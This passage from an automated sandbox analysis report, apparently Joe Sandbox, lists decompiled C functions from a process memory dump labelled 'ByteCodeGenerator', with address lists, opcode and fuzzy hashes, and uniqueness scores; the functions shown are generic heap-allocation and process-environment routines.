                                  				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                                  					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                                  				}
                                  				if( *((char*)(_t11 - 0x1a)) != 0) {
                                  					return E0343EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                  				}
                                  				return _t6;
                                  			}






                                  0x034535a1
                                  0x034535a1
                                  0x034535a5
                                  0x034535ab
                                  0x034535ab
                                  0x034535b5
                                  0x00000000
                                  0x034535c1
                                  0x034535b7

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                  • Instruction ID: c7a53ce50fbf4aeab7d79252f8533ad2567163966931da45f4e613a06fc1f33f
                                  • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                  • Instruction Fuzzy Hash: DED05E39802188DDDB83EF10C1247697261AB00284F5830DBA8030E5538235494A8608
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0342DB40() {
                                  				signed int* _t3;
                                  				void* _t5;
                                  
                                  				_t3 = L03444620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                                  				if(_t3 == 0) {
                                  					return 0;
                                  				} else {
                                  					 *_t3 =  *_t3 | 0x00000400;
                                  					return _t3;
                                  				}
                                  			}





                                  0x0342db4d
                                  0x0342db54
                                  0x0342db5f
                                  0x0342db56
                                  0x0342db56
                                  0x0342db5c
                                  0x0342db5c

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                  • Instruction ID: f80423a169621c03db19089c07ae0dc4c763c5293eed8cdcc3ae382602664484
                                  • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                  • Instruction Fuzzy Hash: 8AC08C30280B00AEEB22AF21CD01B01BAA0BB01B41F8800A1B300EE4F0DB7CD801E604
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E034AA537(intOrPtr _a4, intOrPtr _a8) {
                                  
                                  				return L03448E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                                  			}



                                  0x034aa553

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                  • Instruction ID: 4dcc2eb01a00f626d7d7209015027d7c4fdb913975e79bb57cb1a8f1a41ecaa5
                                  • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                  • Instruction Fuzzy Hash: E8C01236080248BBCB12AE82CC00F067B2AEB94B60F108025BA080E5608632E970EA88
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E03443A1C(intOrPtr _a4) {
                                  				void* _t5;
                                  
                                  				return L03444620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                  			}




                                  0x03443a35

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                  • Instruction ID: 97539e93cd28fcd711e7f822e04c02614eb2718411f1bdb468fc1f1ee244fa61
                                  • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                  • Instruction Fuzzy Hash: 9EC08C32080248BBC712AE42DC00F01BB29E790B60F000021B6040EA708536EC60D58C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E034536CC(void* __ecx) {
                                  
                                  				if(__ecx > 0x7fffffff) {
                                  					return 0;
                                  				} else {
                                  					return L03444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                  				}
                                  			}



                                  0x034536d2
                                  0x034536e8
                                  0x034536d4
                                  0x034536e5
                                  0x034536e5

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                  • Instruction ID: 166ccad005e8f602c74e49595ccbbe339493a01fe9b6540ddb2f771490a95cdc
                                  • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                  • Instruction Fuzzy Hash: 4CC09B79155540BFE725AF31CD51F1AB254F740A61F6C076D72214DAF1D56D9C00E508
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E034376E2(void* __ecx) {
                                  				void* _t5;
                                  
                                  				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                                  					return L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                  				}
                                  				return _t5;
                                  			}




                                  0x034376e4
                                  0x00000000
                                  0x034376f8
                                  0x034376fd

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                  • Instruction ID: a69213cc90af1358922b03e5cd4c8f10f5d0a1b19674b05ed3bc619874702eec
                                  • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                  • Instruction Fuzzy Hash: 50C080B41811805EEB15D704CE30B213D546B0D614F4C019DA6411E5B2C358B403C10C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0342AD30(intOrPtr _a4) {
                                  
                                  				return L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                  			}



                                  0x0342ad49

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                  • Instruction ID: 40405b221347cdbcf9ef576ec05f17c61aea42159d06fb6c7e0a66c210b9a3b7
                                  • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                  • Instruction Fuzzy Hash: 2EC08C32080248BBC712AA46CE00F017F29E790B60F000021F6040E6618A32E861D588
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E03447D50() {
                                  				intOrPtr* _t3;
                                  
                                  				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                  				if(_t3 != 0) {
                                  					return  *_t3;
                                  				} else {
                                  					return _t3;
                                  				}
                                  			}




                                  0x03447d56
                                  0x03447d5b
                                  0x03447d60
                                  0x03447d5d
                                  0x03447d5d
                                  0x03447d5d

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                  • Instruction ID: b6f87760602876da1e482bd039d7612a913a84d8aca2bdafd67232bcd1657bf0
                                  • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                  • Instruction Fuzzy Hash: BFB092343119408FDE16DF28C080B1633E8BB44A40B8800E0E400CBA20D329E8008900
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E03452ACB() {
                                  				void* _t5;
                                  
                                  				return E0343EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                  			}




                                  0x03452adc

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                  • Instruction ID: a5aa215aa561ecdc31d901cbbab9c08f4cf5f62c38da99b8506cf5ff6e18a4d0
                                  • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                  • Instruction Fuzzy Hash: 5BB092328125408FCF02EB40C610B197331AB04650F05449590012B9208228AC01CA40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d37f5fcde24b81aed3ba50d43eb3e5f3355ad9e77db425c33692e13e093e89d2
                                  • Instruction ID: 172775af16b99e7ae9a5bcf661c307581710b4b8b4972c2a31d18d08c4e3d8bb
                                  • Opcode Fuzzy Hash: d37f5fcde24b81aed3ba50d43eb3e5f3355ad9e77db425c33692e13e093e89d2
                                  • Instruction Fuzzy Hash: 1290026165104C06E140B16984147470006DBD1641F51C012A0015954D8756896576F5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 81de6b6e862824d32a0a6e55c70406b7d56c23de4c78ee8ae21033056cc934c3
                                  • Instruction ID: 922fe7590f95b6deecf010f4024f24becf93c112de089a8b85a0704c780688f5
                                  • Opcode Fuzzy Hash: 81de6b6e862824d32a0a6e55c70406b7d56c23de4c78ee8ae21033056cc934c3
                                  • Instruction Fuzzy Hash: 1590027161148406E140B169844464B5005ABE1341F51C412E0416954C87558856A265
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 176876903bef2daaf20402944ae99c1eff7053471b0dbc324cdf994b45ebabd9
                                  • Instruction ID: fa827b4ff2b534d56ae916dd875894fdf91e06b246d0d42cc0fc63b479ec7ac5
                                  • Opcode Fuzzy Hash: 176876903bef2daaf20402944ae99c1eff7053471b0dbc324cdf994b45ebabd9
                                  • Instruction Fuzzy Hash: F490027161144806E100A169480878700059BD1342F51C012A5155955E87A5C8917575
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ec48cd3123e00b730623a8de4991df273339fa2932a3823834036a4cd35cd2f4
                                  • Instruction ID: c38596067c9b377eb8c1eb7a803ad9d6bbae1d113f46fc0ef7630b0669bf13f3
                                  • Opcode Fuzzy Hash: ec48cd3123e00b730623a8de4991df273339fa2932a3823834036a4cd35cd2f4
                                  • Instruction Fuzzy Hash: 6A90026161148846E140A2694804B4F41059BE2242F91C01AA4147954CCB5588556765
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f7f27aab1010eda01daa0d722cffdab02de20c9c93ea788b1f3f0f63c35db11d
                                  • Instruction ID: 72fa3ecf90c0bbef008fbd6f88de11764f286334306d7bea14c565341a5128ab
                                  • Opcode Fuzzy Hash: f7f27aab1010eda01daa0d722cffdab02de20c9c93ea788b1f3f0f63c35db11d
                                  • Instruction Fuzzy Hash: 779002A161144807E140A569480464700059BD1342F51C012A2055955E8B698C517179
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6a48e39a0e3019b54caddd263952f624d0a8f4712e5d4fdc3e476655e5111b73
                                  • Instruction ID: bfe363c624e19a5aabc2a5197ecc209fb05850577a76c55b61c165a9f098f82e
                                  • Opcode Fuzzy Hash: 6a48e39a0e3019b54caddd263952f624d0a8f4712e5d4fdc3e476655e5111b73
                                  • Instruction Fuzzy Hash: 1E9002A162104446E104A169440474600459BE2241F51C013A2145954CC7698C616169
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ca064b35a8fd7fc115006cb7b8b0e5887c7d93dcf940bedfc8b33b9de8397970
                                  • Instruction ID: 98588a8f838aab37acf19149bdf50ebb3109f92076711b53eebc7d6ef0c10124
                                  • Opcode Fuzzy Hash: ca064b35a8fd7fc115006cb7b8b0e5887c7d93dcf940bedfc8b33b9de8397970
                                  • Instruction Fuzzy Hash: 319002A1A11184475540F16948044465015ABE2341391C122A0445960C87A88855A2A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7d2c69c53e16ad83b7c3023756a4281bc7c76c942be0df278593a30ec319dc32
                                  • Instruction ID: 48a1abee4f36f7f26631ce200b7938bea6d82e25857168811199156b16fda286
                                  • Opcode Fuzzy Hash: 7d2c69c53e16ad83b7c3023756a4281bc7c76c942be0df278593a30ec319dc32
                                  • Instruction Fuzzy Hash: F590027165104806E141B16944046460009ABD1281F91C013A0415954E87958A56BAA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 03781baa1dfba82f11f46d8e0c4e4c1a816bccd8d8d7f0b0516dce5abad65912
                                  • Instruction ID: d1833868cf9a4c2043c8ad2ab0f88d150adb244c809ca4906087ef52012543bf
                                  • Opcode Fuzzy Hash: 03781baa1dfba82f11f46d8e0c4e4c1a816bccd8d8d7f0b0516dce5abad65912
                                  • Instruction Fuzzy Hash: 6D90026171104806E102A16944146460009DBD2385F91C013E1415955D87658953B176
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4468996d9563003ae98cfcca31b5b368d4d255ffb097195ba1294a2fa40c168e
                                  • Instruction ID: fcb51eece4e27c7a9909b9fcc45721e3d984b267b3f108e1a4ef1e6cd04cc454
                                  • Opcode Fuzzy Hash: 4468996d9563003ae98cfcca31b5b368d4d255ffb097195ba1294a2fa40c168e
                                  • Instruction Fuzzy Hash: 5E90027161104807E100A169550874700059BD1241F51D412A0415958DD79688517165
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9c4a94d769f2c86267b0f4012ff97f6c484f6e5e5a9f3dc0c6a8c1168c169327
                                  • Instruction ID: e9229be721a6bcb33d4f251a601faf974940f729ac72da702d1dd197aa96dca3
                                  • Opcode Fuzzy Hash: 9c4a94d769f2c86267b0f4012ff97f6c484f6e5e5a9f3dc0c6a8c1168c169327
                                  • Instruction Fuzzy Hash: A390026161508846E100A5695408A4600059BD1245F51D012A1055995DC7758851B175
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3de792536bd0d26c6f94a4e0051790efd8d66e38cdd8e65b768bdbe9a06ad6d9
                                  • Instruction ID: f8bfbd744dd3da6bbb6b15a24e028b3123040f0aecfe7b6e58c08298cd35294a
                                  • Opcode Fuzzy Hash: 3de792536bd0d26c6f94a4e0051790efd8d66e38cdd8e65b768bdbe9a06ad6d9
                                  • Instruction Fuzzy Hash: C290027561508846E500A5695804AC700059BD1345F51D412A041599CD87948861B165
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 86fee784e996bdc21a8e8219460b5bdbd31d661104077022553c5ab77776308c
                                  • Instruction ID: f47eba3ece98ce7b32255ffa39e92e84b185e27d0ba83f92782ebc1f8bd9ea0d
                                  • Opcode Fuzzy Hash: 86fee784e996bdc21a8e8219460b5bdbd31d661104077022553c5ab77776308c
                                  • Instruction Fuzzy Hash: 0B90027171104456A500E6A95804A8A41059BF1341B51D016A4005954C879488616165
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 33f7d0fbe2ebddc24a70f5794d1f31d3c6ee0b109bee0a3aefae50a1cd7972fe
                                  • Instruction ID: 72b4546c12fd468ebec9c6d0e4c80bb48d915e7c2d91f432c84624516dc93436
                                  • Opcode Fuzzy Hash: 33f7d0fbe2ebddc24a70f5794d1f31d3c6ee0b109bee0a3aefae50a1cd7972fe
                                  • Instruction Fuzzy Hash: FB900261A1504806E140B169541874600159BD1241F51D012A0015954DC7998A5576E5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 52fd59a00790f581183b0ec7b02e9b63e48fea48adf57af506ab8a9a85ad086b
                                  • Instruction ID: f099cbc4cb6e0569d9ee2a0d0d0ac859f123c6f85c2f06821e819d0db01813f7
                                  • Opcode Fuzzy Hash: 52fd59a00790f581183b0ec7b02e9b63e48fea48adf57af506ab8a9a85ad086b
                                  • Instruction Fuzzy Hash: 6890027161508C46E140B1694404A8600159BD1345F51C012A0055A94D97658D55B6A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c3032b546bfc34132fe1723ca17db26b3836d11d6c9e5e4831e1b41ccb325669
                                  • Instruction ID: 54680591ee48bf1b00a56af1e92c021227c6c9744277e34c280fa00b454f615e
                                  • Opcode Fuzzy Hash: c3032b546bfc34132fe1723ca17db26b3836d11d6c9e5e4831e1b41ccb325669
                                  • Instruction Fuzzy Hash: 6A900271A1504C06E150B169441478600059BD1341F51C012A0015A54D87958A5576E5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a135f7ece845bbfd4a315457ddd9002bd229999205ae18278083d021beaa7978
                                  • Instruction ID: c192c8b09b3091f385dec31a72fd70a07cdc3b9a9927f7f660a428cea9f11ec6
                                  • Opcode Fuzzy Hash: a135f7ece845bbfd4a315457ddd9002bd229999205ae18278083d021beaa7978
                                  • Instruction Fuzzy Hash: F690027161104C46E100A1694404B8600059BE1341F51C017A0115A54D8755C8517565
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 688b78ea1ec82516399805eac8c1de9c6db6c2dc8119e41e7bc3abb0c67171f6
                                  • Instruction ID: d8edb79dd30ee97d01da31f33548844c5c63a5583db99d2129b9bc8bc14b7c88
                                  • Opcode Fuzzy Hash: 688b78ea1ec82516399805eac8c1de9c6db6c2dc8119e41e7bc3abb0c67171f6
                                  • Instruction Fuzzy Hash: 69900265631044061145E569060454B0445ABD7391391C016F1407990CC76188656365
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b8c0cd1c35c90dc6c2e370d137a98b3095f3e1d577c2569c27e63a5cd6d057fe
                                  • Instruction ID: 0435cb6434b1cb77ab1574ee5660fca787ad625399530d926a30b264e770904d
                                  • Opcode Fuzzy Hash: b8c0cd1c35c90dc6c2e370d137a98b3095f3e1d577c2569c27e63a5cd6d057fe
                                  • Instruction Fuzzy Hash: 1F9002E1611184965500E2698404B4A45059BE1241B51C017E1045960CC7658851A179
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5a37de3b2da18674f9f651ff6b2c942650154c96f86c42f45b302c61634ecd8c
                                  • Instruction ID: a5c52aa31275a082797f1a3eb9df66d81a00f062dde9ef71e8cd0fcf51ec12a2
                                  • Opcode Fuzzy Hash: 5a37de3b2da18674f9f651ff6b2c942650154c96f86c42f45b302c61634ecd8c
                                  • Instruction Fuzzy Hash: B9900271E1504416A140B16948146864006ABE1781B55C012A0505954C8B948A5563E5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6e8026985f5815075426e4b0da069dc232681f8d0e432cf6e3dd7c190b1a2a6e
                                  • Instruction ID: 93c5e22b8fe5d7c7ceccc0edd63bf5984bbf139df977c4b23ac7e51705da1e80
                                  • Opcode Fuzzy Hash: 6e8026985f5815075426e4b0da069dc232681f8d0e432cf6e3dd7c190b1a2a6e
                                  • Instruction Fuzzy Hash: 4890027161104C06E104A16948046C600059BD1341F51C012A6015A55E97A588917175
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction ID: 790c8d47ce1cfb9a511b5437f697dc0b86822856aad779b22bdde0358c4e9ac3
                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction Fuzzy Hash:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 53%
                                  			E034BFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                  				void* _t7;
